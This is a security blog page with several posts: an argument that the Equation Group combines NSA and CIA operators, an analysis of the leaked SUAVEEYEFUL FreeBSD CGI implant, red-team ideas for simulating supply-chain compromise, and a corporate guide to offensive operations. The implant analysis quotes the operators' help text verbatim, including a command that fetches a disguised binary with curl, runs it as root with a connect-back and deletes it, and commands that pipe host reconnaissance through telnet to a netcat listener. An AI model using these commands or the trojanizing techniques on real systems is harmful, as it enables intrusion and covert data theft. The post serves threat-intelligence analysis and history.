xorl %eax, %eax

Why the Equation Group (EQGRP) is NOT the NSA

leave a comment »

I had covered this topic in my 2021 talk “In nation-state actor’s shoes” but after my recent blog post I saw again people referring to the EQGRP as the NSA which is not entirely correct. EQGRP is actually a combination of cyber operators (mostly) from the NSA’s TAO and the CIA’s IOC. So, a more accurate statement would be that the EQGRP is the US intelligence community. Here’s why…

WikiLeaks did the Vault 7 leak in 2017. Over the years this was confirmed to be a real/valid leak, and it provides unprecedented access not only on the CIA tools themselves, but also the culture and work environment inside CIA’s cyber component. This is the core source of this blog post.

Brief History of CIA IOC

After the 9/11 terrorist attacks, the CIA took the lead in the counter-terrorism efforts of the US, gaining access to almost unlimited budget, support, and resources to achieve its mission. That also meant that CIA could now expand their domain beyond their area of expertise, Human Intelligence (HUMINT), to other intelligence (and covert action) disciplines, including Signals Intelligence (SIGINT). In other words, develop their own cyber capabilities.

In 2015 the CIA publicly announced a new directorate responsible for improving the Agency’s digital capabilities. This reportedly started from a 2013 initiative by CIA Director Brennan. It was named the Directorate of Digital Innovation (DDI), headed by a Chief Information Officer (CIO), and covering all sorts of topics like modernisation of digital platforms, digitisation of manual processes, developing software for CIA’s needs, etc. Unsurprisingly, CIA’s DDI was relying extensively on the US intelligence community’s experts to develop those capabilities and by far the most mature US agency for cyber operations/SIGINT is the Department of Defense’s National Security Agency (NSA).

Inside DDI, CIA created the Center for Cyber Intelligence (CCI) which was responsible for intelligence support from the cyber domain. As per the Vault 7 leak this is where the “hacking division” (as WikiLeaks called it) fell under in 2016, when it had over 5000 registered users responsible for developing, maintaining, enhancing and using cyber capabilities to support CIA’s mission. Based on the Vault 7, this was the Information Operations Center (IOC). IOC was the cyber operators of CIA’s CCI. Meaning they were using the capabilities provided by other departments of CCI to support CIA’s intelligence operations from the cyber space.

Based on the leaks we can be certain that CCI was operational (maybe under a different org. structure) years before that 2015 public announcement for DDI, at least since 2008-2009.


One of the largest departments within the CCI was the EDG (Engineering Development Group), responsible for multiple divisions of engineering branches that were developing and maintaining different cyber capabilities for the IOC operators, the wider US intelligence community, and close allies. For instance, the Applied Engineering Division (AED) that had the Embedded Development Branch (EDB), Remote Development Branch (RDB), Operational Support Branch (OSB), etc.

A senior group of EDG employees were members of the EDG’s Technical Advisory Council (TAC) which, as its name implies, was there to review different technical challenges and provide input and expert recommendations.

The TAC Discussion on EQGRP

After Kaspersky’s “Inside the EquationDrug Espionage Platform” was published, the TAC started a discussion to identify the mistakes that led Kaspersky GReAT researchers uncovering a vast amount of US cyber capabilities, and associating them all under the EQUATION GROUP (EQGRP) alias. Here you can read the full thread on WikiLeaks.

From this discussion alone, we can see that:

  • EQGRP was actually a collection of capabilities by mostly NSA’s Tailored Access Operations (TAO) and CIA’s IOC
  • In some cases parts of the same implant were co-authored by CIA and NSA
  • CIA IOC and NSA TAO had different processes (or lack of them) for (re-)using cyber capabilities

And many lessons learned to avoid this compromise of their capabilities in the future. In general, I highly recommend you reading this thread since it’s a nice retrospective giving a glimpse into a nation-state actor’s reactions when a high-quality threat intelligence report is released.


News, and even some cyber threat intelligence analysts, repeating the narrative of EQGRP being the NSA is almost certainly wrong. Unless that Vault 7 was a deception operation (unlikely after all the past years’ research on it), we can conclude that the above discussion by TAC makes it very clear that EQGRP was a collection of cyber capabilities used by the cyber operators of the United States, mostly by NSA’s TAO and CIA’s IOC.

I know it’s not as sexy saying that the US was behind it compared to NSA TAO was behind it; and indeed, we can make some assumptions that exploits from the early 2000s were most likely from NSA TAO since CIA either didn’t had that capability yet, or it was still in its early development stages, heavily relying on NSA’s support, or use other means to decouple EQGRP into smaller actors for the CIA, the NSA, and others. However, EQGRP as it’s known today, it’s almost certainly not the NSA alone.

Lastly, any time you talk about nation-state attribution don’t forget that it’s called the “intelligence community” for a reason. Agencies in an IC share capabilities. Some (like within the same country) would be sharing almost everything, others (like the FIVE EYES) are sharing a lot, and others (like the MAXIMATOR) share more specific capabilities and products. And also remember that (that’s an excerpt from my 2021 talk):

  1. Nation-state actors are just people doing a job with specific objectives and performance goals
  2. It’s hard (usually) to know the intention. This is why geopolitical monitoring matters
  3. Infrastructure of an APT doesn’t mean the same APT executed the operation or that they were interested in you
  4. APT groups do most of their collection in bulk/automated fashion yet almost all research focuses on tailored/targeted access
  5. Attribution is hard… Think critically before you publish

Written by xorl

July 6, 2022 at 18:50

The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP

leave a comment »

I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled suaveeyeful_i386-unknown-mirapoint3.4.3 and it reveals lots of interesting details. In summary:

  • SUAVEEYEFUL is a CGI software implant for FreeBSD and Linux
  • SUAVEEYEFUL was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University at least since the early 2000s
  • The leaked file/operation was targeting MiraPoint email products
  • SUAVEEYEFUL had some innovative, for its time, TTPs like data encryption and fileless malware

The Leaked Files

In that directory there are a few different files. Those are:

  • bdes: A copy of the FreeBSD bdes (tool to encrypt/decrypt using DES) command line utility, based on the FreeBSD bdes version (from 22 Sep. 2000), but compiled on Linux in 2003.
  • decode-base64: Simple Perl decoding script using MIME::Base64.
  • implant: ELF binary software implant component of SUAVEEYEFUL, built for i386 on FreeBSD version 4.3 (this version was released in April 2001).
  • implant.mg1.waseda.ac.jp: ELF binary software implant component of SUAVEEYEFUL used against the Japanese Waseda Research University’s email gateway (variant of the implant file).
  • opscript.se: The commands to execute in order to install the SUAVEEYEFUL (abbreviated as SE) software implant in the Japanese Waseda Research University.
  • se: The client component of the SUAVEEYEFUL software implant, written in Bash. This copy has hardcoded targets for the Japanese Waseda Research University.
  • se.old: Previous version of the SUAVEEYEFUL software implant client, written in Bash. This copy has a hardcoded target for the Chinese Ministry of Foreign Affairs email gateway.

The utilities (bdes, decode-base64 and uriescape) were bundled along with SUAVEEYEFUL because they are internally used. This ensured that the software implant would not rely on any external dependencies (other than default, at the time, core system utilities like ls, cat, telnet, etc.)

List of the files leaked by the Shadow Brokers under the suaveeyeful_i386-unknown-mirapoint3.4.3 directory


The se.old client was potentially the one the operators were adapting for their new target. That is due to inconsistencies in its content which make it look like a draft/edited version of an old operation. A leftover comment identifies the mail.mfa.gov.cn ( as its configured SUAVEEYEFUL target.

This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even to today, this IP address ( still points to an email server from China’s MFA. It’s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant. Based entirely on the build times, we can assess that it was at least since the early 2000s.

The current website hosted on mail.mfa.gov.cn

Most of the files included in the leaked directory were designed for another target. The email gateways of the Waseda Research University, which according to its official website, “strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.”

The se client had two compromised Waseda email gateways configured, and both accessed via their internal IP addresses from another compromised host, referenced only by its IP address. So, at least 3 systems in Waseda’s infrastructure were compromised by the EQUATION GROUP since at least 2003.

  • mp450 (
  • mg1.waseda.ac.jp (
  • – another compromised host

The top host (mp450) was the university’s MiraPoint 450 (later renamed to RazorGate 450), an email security appliance. And the other host (mg1.waseda.ac.jp) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of mp450) we can deduce that it was likely a system located in the university’s DMZ network segment.

Simplified visualisation of the SUAVEEYEFUL installation process

Installation of SUAVEEYEFUL in Waseda’s MiraPoint Servers

This is clearly described in the opscript.se file which we can assume that it was one of the first operational tasks that the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is that process:

  1. Copy the implant to the /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi file
  2. Change nph-help.cgi‘s file permissions to 555
  3. Change nph-help.cgi‘s ownership to “root” with group “nobody”
  4. Use touch -r to ensure file nph-help.cgi as well as anything under /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/ directory have the same timestamps as the legitimate /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/publish.html MiraPoint web service
  5. Use netcat to start a listening on port 444, decoding the received data with Base64 and decrypting them using bdes with a hardcoded key (0x4790cae5ec154ccc in this case)
  6. Connect-back from mp450‘s SUAVEEYEFUL implant to the listening 4444 port and provide some basic system information (who is logged in, list files/directories, etc.)

The SUAVEEYEFUL Software Implant

The SUAVEEYEFUL (or SE) has two components, the client and the server. The server component is a very simple CGI program written in C for FreeBSD, and looking for input at its help endpoint. Any commands received would be executed (with root privileges as shown in the previous section) using the system() library call, as long as they match the defined format (described later in this post).

The client side ensures that all requests are properly requested, encoded (using Base64) and encrypted (with DES). The client supported 4 options:

  • -h: Display help message
  • -c: Execute command
  • -i: Input target (e.g. the URL of a host running the SE server component)
  • -k: Key used for DES encryption
Screenshot of the se client used to target the Waseda University

As we can see from this, for the generation of the cryptographic material, EQUATION GROUP was using the system’s /dev/random in the following way:

head -c 8 /dev/random | hexdump -e '/8 \"0x%016x\n\"'

The command was then structured with # being used as a separator. The main command to be executed was constructed with this:

echo "`head -c 8 /dev/random | hexdump -e '/8 "%016x\n"'`#`date +"%s"`#$cmd"|bdes -k $key > out

Which results into a format that looks like that:

This structure was then encrypted using the hardcoded DES key, and passed through uriescape tool to ensure that there will be no parsing issues by the receiving MiraPoint web server.

Apart from the above, the client also used the date +”%N” command to get the date in nanoseconds and encrypt it with a key matching the same value. This was an anti-analysis/anti-detection trick since it would be hard for anyone to get the SE software implant to execute any command without this non-intuitive addition to its expected input.

The generation of the three values and sending the full command message to the compromised system running the SUAVEEYEFUL software implant server component

Lastly, the SE help message displayed three instructions on example commands that the operator could use. The three help commands were performing the following tasks:

  1. Install a fileless malware by doing the following:
    • Create a hidden directory (/tmp/.scsi)
    • Use curl to download a binary deceivingly named sendmail from the operational host (
    • Run sendmail as root and connect-back to the operational host on a different port (
    • Remove the sendmail binary file so that it’s running only in memory, not from the filesystem
  2. Execute commands with connect-back method:
    • Run w followed by ls -l and ls -l /tmp to get the logged in users and contents of the current and /tmp directories
    • Encrypt and encode the output
    • Send it to the operational host on its listening port (
    • The message also guides the operator on how to generate a new DES encryption key
  3. Same as #2 but without the Base64 encoding and DES encryption

Here is the full help message:

1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) > /dev/null 2>&1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 

2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET

Use this to generate a random key and replace SECRET with the key
  head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'

3) se -c"(w; ls -l; ls -l /tmp) | telnet 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444


DO NOT -burn!!!
Use -exit

Written by xorl

June 22, 2022 at 10:19

Ideas for Software Supply-Chain Attacks Simulation by Red Teams

leave a comment »

The purpose of red teams is to simulate real adversaries to test both the technical security controls and non-technical (e.g. response procedures, DFIR playbooks, and so on) of an organisation. 4 years ago I posted a proposal on how red teams could/should deploy multi-stage C2 infrastructures. Now I’ll highlight another increasing threat for most companies.

Whether this is nation-state actors, shared libraries, hacktivists or anything else in between. Software supply-chain intrusions are getting a lot of attention. So, if you are a red teamer and you’re looking for ideas on how to simulate those, here are a couple of ideas.

Why bother? Well, to provide more value to your customers by a practical assessment on whether they can effectively protect (or at least detect) against supply chain threats.

Internal Code Repositories

Assuming you got access to an endpoint of a developer, administrator, engineer, etc., modify code or configurations in internal code repositories in order to propagate to more systems/networks. For instance check if your “user” can access: Git repositories, CI/CD pipelines, config. management (Saltstack, Ansible, Terraform, Puppet, Cfengine, JAMF, Rudder, Chef, SCCM, etc.), cloud deployment tools, container images, etc. and try to push implants or expand access via those means.

Waterhole-enabled Supply Chain

At some point it is almost certain that you’ll obtain access to something beyond an endpoint. It could be a fileserver, an internal web application server, a cloud/3rd party service, a container running some small service or anything else. Well, instead of trying to pivot via “traditional means” why not modify the service that is offered from this system to push out an implant or take an action to anyone that uses it to increase your access?

In-house Packages/Software

It is possible that you might stumble across some (open source or proprietary) software that is either mirrored internally in some repositories or it’s customised for whatever business reason and hosted in something like a fileserver, a package repository, or something along those lines. Here you could try to trojanize those and wait for them to propagate.

Software Update Solutions

It’s not uncommon for organisations to have automated or semi-automated solutions for performing software updates. If you could modify those updates to include an implant you could very effectively emulate a supply-chain propagation. Hint: Some of those systems rely on inherently insecure protocols (e.g. FTP, TFTP, SMTP, HTTP, etc.) so you could even hijack/MiTM/trojanize them on the network-level if you have access to the links they are passing to/from.

Fleet Management

Similarly to the previous one, even small organisations will rely on one (or more) fleet management solutions and if you manage to get access there it’s, more or less, the same as having a nice C2 preconfigured for you. So, why not use that to expand your access?

Pre-agreed Access

It is possible that as part of your Statement of Work (SoW) you will be given some limited access. If you aim on evaluating the supply-chain capabilities of that organisation, you could ask for access to some internal application or, even better, a 3rd party system/application/service the organisation relies on and use that as your starting point. Meaning, the engagement starts under the assumption that this 3rd party is compromised.

I’m pretty sure there are tons more concepts that a red team could take advantage of depending on the organisation they target. But hopefully the above gives you some ideas on how to evaluate supply-chain threats in a relatively controlled but realistic manner.

Written by xorl

April 7, 2022 at 15:21

Posted in security

Guide on Offensive Operations for Companies

leave a comment »

I’ve been thinking of writing this post for some time, but I decided to finally do it. Everything I wrote here heavily depends on what you are legally allowed to do which, in turn, depends on the country of your legal entity/company, regional laws and regulations, international laws affecting you, as well as the business itself (for instance, a cyber-security firm would have way more freedom compared to a retail business). This is why if you decide to move into offensive operations against your adversaries, you MUST first check your objectives with your legal advisor and get their sign-off.

That being said, there are many levels between doing nothing and hacking-back an adversary. Some of which are pretty common, and others that are only employed by nation-state actors. To simplify the structure, I created a diagram that tries to put them in some sort of framework that will help you decide which offensive operations you are legally allowed and technically capable of performing. Feel free to use this as a starting guide if you aren’t sure on where to start; but do not limit yourself only to what’s mentioned there, develop it further based on your needs and capabilities. It should give you a starting point. Under the diagram you’ll find a brief explanation of what each mentioned name means.

Starting from the low complexity, low business risk and moving we have:

  • Local Deception Operations: All the cyber deception that can be implemented internally in a company’s environment such as honeytokens, honeypots, honey networks, canary tokens, deception/fake networks, etc. in order to lure the adversary into a highly controlled environment and monitor their activities, and/or to quickly detect and deny/disrupt their operation.
    • Offensive action: Tricking the adversary into actions that will give you the detection and response tactical advantage.
    • Complexity: Low/medium
    • Business risk: Minor (due to keeping all those deception operations confidential which could result in a negative impact/perception by employees, as well as complex processes within the security team(s))
  • Infrastructure Takedowns: That is reporting and requesting takedowns of malicious infrastructure through either service providers or directly via the hosting companies. This includes things like request takedown of phishing domains, malware hosting servers, email accounts, etc.
    • Offensive action: Depending on the takedown this could be a degradation, denial, disruption, or destruction operation against an adversary’s infrastructure, inducing them cost to reestablish that.
    • Complexity: Low/medium
    • Business risk: Medium. Process needs to be well-defined to avoid any issues such as requesting takedowns of legitimate infrastructure, having legal issues from the affected companies, avoid leaking sensitive information on the takedown requests, etc.
  • Indirect Public Disclosure: Several threat intelligence vendors and national CERTs allow for anonymized reporting/public disclosure of intelligence reports. This capability allows a company to publicly disclose details that would otherwise have the risks of the “Public Disclosure” operations mentioned later.
    • Offensive action: Forcing the adversaries to change their TTPs (thus inducing cost and delays to their operations), making it globally known what the adversary does and how, which could enable nation-state actors or other companies to use this public material as supportive evidence in more aggressive offensive actions.
    • Complexity: Low
    • Business risk: Minor when the anonymization is done carefully.
  • Active Darkweb Monitoring: By that term I mean any sort of operations to obtain access and monitor your adversaries’ communication channels (e.g. Telegram groups, darkweb forums, etc.) to know as early as possible any offensive actions targeting your business and take appropriate measures. For most companies this is typically implemented that via threat intelligence vendor(s).
    • Offensive action: Infiltrating into the adversaries’ communication platforms and collecting intelligence on their activities.
    • Complexity: Low/medium
    • Business risk: Minor when done via a vendor. Medium when developed in-house as it requires high discipline, processes, OPSEC measures, legal and privacy sign-offs, etc.
  • Collaboration with Authorities: That is proactively reaching out to law enforcement and/or intelligence agencies related to cyber operations to help them in an operation against a specific adversary. For instance, providing them with evidence, information only your company has, etc.
    • Offensive action: Potential for nation-state action against your adversary(-ies) such as prosecution, diplomatic/external actions, sanctions, covert actions, etc.
    • Complexity: Medium
    • Business risk: This imposes a noticeable risk of affiliation of a business with a specific government and/or political party, having accidental involvement in unrelated government issues, becoming an “agent” of the authorities you worked with, seen as a nation-state proxy by other countries/governments, etc.
  • Legal Actions: This involves any sort of legal actions your company might impose to an adversary such as cease and desist letters, seizure of malicious infrastructure, criminal complaints on specific adversaries, sanctions, etc.
    • Offensive action: Active and overt approaches to disrupt and destroy adversarial activities through legal means.
    • Complexity: Medium/high
    • Business risk: Medium/high. This will require experienced investigators, digital forensics experts with practical legal/prosecution experience, processes for building a criminal case and managing the evidence, experienced legal resources, appetite for public exposure, and of course, acceptance that now your adversaries know what you know, and there is always a chance that you might lose the case when it gets to the court.
  • Public Disclosure: This a foreign policy tool of many nation-state actors which can also be implemented in private companies. By making everyone aware of who targeted you, especially for nation-state actors, to the entire world you give ammunition to any other nation-state to use this information against your adversaries, without your direct involvement.
    • Offensive action: Revealing an operation that was aiming on being covert, causing the adversaries to change their tactics, and giving their adversaries the opportunity to use this disclosed material against them.
    • Complexity: Medium/high
    • Business risk: Medium/high. This disclosure might bring a lot of negative press, and will also reveal what you know. This means that those adversaries are likely to use more advanced techniques the next time they’ll go after your company. Furthermore, nation-states might request your support in legal actions. For a less risky approach, check the “Indirect Public Disclosure” operations.
  • Remote Passive SIGINT (Signals Intelligence): This means obtaining signals (typically raw network traffic or raw communications) by third parties such as data brokers or threat intelligence vendors, which can help you proactively discover adversarial activities.
    • Offensive action: Inspecting data collected outside your organization to proactively discovery and deny any adversarial activity against your company.
    • Complexity: Medium
    • Business risk: Minor. The only risk is to make sure you do not use any illegal or shady services, and instead rely on industry standards and well-known vendors.
  • Remote Deception Operations: Such operations include the creation of fake profiles of your company, fake publicly exposed services, fake leaked documents with tracking tokens, etc. This is a lighter version of the “Sting Operations” discussed later.
    • Offensive action: Hunt adversaries by luring them with fake targets so that you can catch them before they target the real assets of the company.
    • Complexity: Medium
    • Business risk: Minor. Mostly around having strong processes to avoid security mistakes which will jeopardise your security posture, and keep those well-managed, but also operating on a need-to-know basis.
  • Data Breach Data Exploitation: This means getting access to data from data breaches and using them to uncover adversarial activities or intelligence which will help you proactively protect your company. Examples include proactively discovering infrastructure used for malicious purposes, accounts used by adversaries, deanonymization, etc.
    • Offensive action: Exploiting data which would otherwise be confidential to the organization that had them, in order to get more insights on your adversaries.
    • Complexity: Medium
    • Business risk: Medium. There is a lot of legal and ethical debate over the data breach data exploitation and that could have some business impact for a company. Additionally, the handling of such data involves some complexity in terms of access management, auditability of who did what and why, retention policies, etc. which means additional resources, technology, and processes will likely be needed.
  • False Flag Operations: An advanced offensive technique to trick your adversaries into a thought process to take advantage over their actions. For instance, make it look like a rival adversary leaked information about them, or have them believe that a rival adversary has already compromised the systems they are in.
    • Offensive action: Dynamically and actively change your adversaries’ TTPs by forcing them into believing that something other than what they see is happening.
    • Complexity: Medium/high
    • Business risk: Medium/high. Those operations need very careful planning, discipline and could easily backfire in a variety of different ways including negative media attention, making your adversaries switch to more advanced techniques, legal actions from government bodies that you might have interfered with their operations, having the opposite effect, etc.
  • CNA Operations: Computer Network Attack (CNA) operations are any activities that will cause degradation, disruption, or destruction of the adversaries infrastructure and resources. Examples include denial of service attacks, seizure of their resources, flooding their resources (e.g. mass mailers, automated calls, etc.), making countless fake accounts on their platforms, spam, feeding them with fake data, etc.
    • Offensive action: Causing the adversaries to focus their efforts on responding to the CNA operation instead of performing their intended malicious activity.
    • Complexity: High
    • Business risk: High. This is a very grey area which might get the company into them being treated as a criminal entity. There needs to be a very thorough legal and business alignment on how, why, who, when, and where those activities will happen, and in most cases it is (legally) impossible for most companies to perform such operations.
  • Sting Operations: Here the defenders could try to pose as criminals to infiltrate a group, or set up a fake website to recruit cyber-criminals, and other similar operations with the end goal to infiltrate the adversary’s entities.
    • Offensive action: Proactively identifying adversarial plans and denying them by applying the appropriate security controls.
    • Complexity: High
    • Business risk: High. For the vast majority of companies out there, it would be impossible to legally do this. However, some might be able to pull this off in collaboration with the authorities. The risk is high and on multiple levels, from public relations, to impacting law enforcement operations, to privacy and legal issues, etc.
  • Takeover: In takeover operations the private company uses their knowledge and resources to take control of infrastructure operated by the adversary. This will not only induce costs to the adversaries for new infrastructure, but it can also reveal details of their TTPs, identifiable information connecting them to their real identities, and so on.
    • Offensive action: Denying access to the adversaries, disrupting or degrading their operations, and collecting a significant part of their digital capabilities and information.
    • Complexity: High
    • Business risk: High. Back in the day, those were a common occurrence but as cyber is becoming more and more of a regulated and controlled space, conducting a takeover could result in very serious legal and PR implications for a business. Nowadays, those are typically limited to specific companies operating in this space and government entities. They can still be performed by others, but it is a complex process with many moving parts.
  • Online HUMINT (Human Intelligence): The purpose of those operations is both to understand and infiltrate into adversarial groups/networks by exploiting human weaknesses (e.g. social engineering, recruiting insiders, etc.), but also to disrupt their operations from the inside. For example, recruit (or become) an influential member and create tensions in the group, make arguments to change the group’s focus from operations to internal conflicts, create division among members, etc.
    • Offensive action: Depending on the level it could be anything from collecting intelligence on the TTPs of the adversary to proactively protect your assets, all the way to creating internal conflicts that will result in disrupting or destroying a group entirely. In some cases, those tensions could go as far as members reporting each other to the authorities.
    • Complexity: High
    • Business risk: High. Those operations are typically limited to nation-state actors that have dedicated resources for such covert activities. It is not unheard of that a private company could support those, but the risk is quite high due to the potential impact a business could have from both the adversaries and the involved authorities.
  • 3rd/4th Party Collection: In simple terms this can be considered a step up from the “Takeover” operations discussed earlier. Here the operation doesn’t involve only taking over the adversary’s infrastructure, but using it to collect data from where this infrastructure has access to. For example, you might have taken over a Command & Control server and in there found some VPN connections for a server the threat actors use. You use them to access and collect intelligence and/or disrupt their operations. That could go in multiple levels on the other side too. For instance, use the C&C to send commands on the infected hosts (if an adversary system is infected) and collect data (or perform other actions) there too.
    • Offensive action: Exploitation of adversarial infrastructure in multiple levels, masking your activities using the taken over system(s). This could be used for anything from intelligence collection to disruption, degradation, denial, etc.
    • Complexity: High
    • Business risk: High. Those operations are typically limited to nation-state actors that have dedicated resources for such covert activities. It would be very complex and risky for any private company to try to conduct this since it involves breaking into systems in multiple levels.
  • CNE Operations: This is the research to identify and exploit vulnerabilities in order to execute a Computer Network Exploitation (CNE) operation against an adversary. For instance, find a software vulnerability in their malware allowing you to takeover their C&C, or identify a misconfiguration on their operational hosts allowing you to infiltrate into it, etc. This is what is commonly known as hacking-back.
    • Offensive action: Exploitation of adversarial infrastructure. This could be used for anything from intelligence collection to disruption, degradation, denial, etc.
    • Complexity: High
    • Business risk: High. Those operations are typically limited to nation-state actors that have dedicated resources for such covert activities. It would be complex and risky for any private company to try to conduct this since it involves breaking into systems.
  • Automated CNE: That is scaling-up the “CNE Operations” by automating the exploitation step. That is, developing the ability not only to take advantage of the identified vulnerabilities in adversarial infrastructure, but automatically (or on-demand via automation) exploiting all existing and newly deployed adversarial infrastructure with no (or minimal) human interaction.
    • Offensive action: Exploitation of adversarial infrastructure. This could be used for anything from intelligence collection to disruption, degradation, denial, etc.
    • Complexity: High
    • Business risk: High. Those operations are typically limited to nation-state actors that have dedicated resources for such covert activities. It would be complex and risky for any private company to try to conduct this since it involves breaking into systems.

Written by xorl

December 28, 2021 at 15:28

Posted in security

Predict 21: Tradecraft Tips for Unusual Recorded Future Uses

leave a comment »

Since it’s first instance (known as RFUN back then), the Recorded Future’s intelligence summits have been one of my favourite industry events. That’s not only due to the content which is always incredible and covers multiple aspects of the intelligence world, but also for the overall atmosphere of the event. The attention to detail and passion of the organizers is apparent if you ever had the opportunity to attend either RFUN or its successor, called Predict.

In 2019, together with an amazing colleague, we had the honour to do a podcast for RFUN while attending the event. But this year, I was even more excited since a talk I had submitted was accepted and that marked my first speaking event at Predict. My talk was titled “Tradecraft Tips for Unusual Recorded Future Uses” and was about, more or less, what the title says.

That is, tradecraft tips on how you can use Recorded Future’s platform for things that aren’t so common knowledge. For example, taking advantage of the platform’s OCR capabilities, crisis monitoring, how you can take advantage (“exploit” in intelligence lingo) of “noisy” sources, threat actor tracking and alerting, enriching the platform by onboarding new sources, etc.

Now on the event itself, there were some great talks and people presenting (which makes it even more humbling to be part of it). To give you an idea talks included people like Sir Alex Younger, Former Chief of MI6, multiple CISOs of big U.S. cities like Los Angeles and New York, representatives of the Dutch High-Tech Crime Unit, and of course, lots and lots of experienced intelligence experts from both Recorded Future’s intelligence teams, and other private companies. You can check the agenda here on your own.

Now for this blog post here, I’d like to close it with something that is common knowledge but frequently forgotten… No matter how “smart” your technology is, it’s how the people use it that matters.

Think about it from the public sector side too… You might have some super impressive spy satellites with SAR CCD, dozens of sensors… And yet, what if all your analysts just use the optoelectronic and FLIR sensors? Does it matter?

So… Regardless of what technologies you have available, ensure that you make the most of what they offer. Whether this is your SIEM, your XDR, or even your spy satellites! :)

Written by xorl

October 27, 2021 at 13:17